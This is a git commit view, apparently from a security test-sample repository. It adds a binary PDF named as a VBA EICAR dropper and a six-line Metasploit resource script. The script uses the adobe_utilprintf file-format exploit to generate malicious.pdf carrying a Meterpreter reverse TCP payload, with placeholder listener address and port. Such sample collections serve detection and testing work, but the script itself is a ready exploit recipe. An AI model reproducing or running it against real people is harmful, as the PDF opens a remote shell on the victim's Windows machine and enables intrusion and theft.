summaryrefslogtreecommitdiff
path: root/malware
diff options
context:
space:
mode:
Diffstat (limited to 'malware')
-rw-r--r--malware/maliciouspdf.rc6
-rw-r--r--malware/pdf-doc-vba-eicar-dropper.pdfbin0 -> 10381 bytes
2 files changed, 6 insertions, 0 deletions
diff --git a/malware/maliciouspdf.rc b/malware/maliciouspdf.rc
new file mode 100644
index 0000000..71c6c09
--- /dev/null
+++ b/malware/maliciouspdf.rc
@@ -0,0 +1,6 @@
+use exploit/windows/fileformat/adobe_utilprintf
+set FILENAME malicious.pdf
+set PAYLOAD windows/meterpreter/reverse_tcp
+set LHOST listening_ip
+set LPORT tcp_port
+exploit
diff --git a/malware/pdf-doc-vba-eicar-dropper.pdf b/malware/pdf-doc-vba-eicar-dropper.pdf
new file mode 100644
index 0000000..ebd6c4b
--- /dev/null
+++ b/malware/pdf-doc-vba-eicar-dropper.pdf
Binary files differ